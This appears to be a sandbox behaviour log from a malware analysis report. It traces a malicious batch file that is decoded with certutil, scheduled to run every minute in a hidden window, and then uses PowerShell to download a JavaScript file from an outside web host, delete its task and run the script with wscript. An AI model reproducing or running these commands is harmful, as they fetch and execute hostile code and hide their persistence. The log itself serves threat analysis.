Technical Information
- <SYSTEM32>\tasks\mhgnyk8flz
- '<SYSTEM32>\certutil.exe' -f -decode vaIA0Oxz.bat vaIA0Oxz.bat
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 1 /tn MHgnYK8fLZ /tr "%TEMP%\vaIA0Oxz.bat"
- %TEMP%\vaia0oxz.bat
- <SYSTEM32>\tasks\mhgnyk8flz
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\vaIA0Oxz.bat"' (with hidden window)
- '<SYSTEM32>\taskeng.exe' {BBF07C28-BEF3-4098-9A0A-B90E24EDCF12} S-1-5-21-3150914307-1777937420-491476919-1000:vcxnpicf\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\vaIA0Oxz.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "IWR -UseBasicParsing 'https://entertainment-in-tenerife.com/wp-content/uploads/reader.php' -OutFile '%TEMP%\y9e0jr5h.js'; schtasks /delete /f /tn MHgnYK8fLZ; wscript %TEMP%\y9e0jr5h.j...
- '<SYSTEM32>\schtasks.exe' /delete /f /tn MHgnYK8fLZ
- '<SYSTEM32>\wscript.exe' %TEMP%\y9e0jr5h.js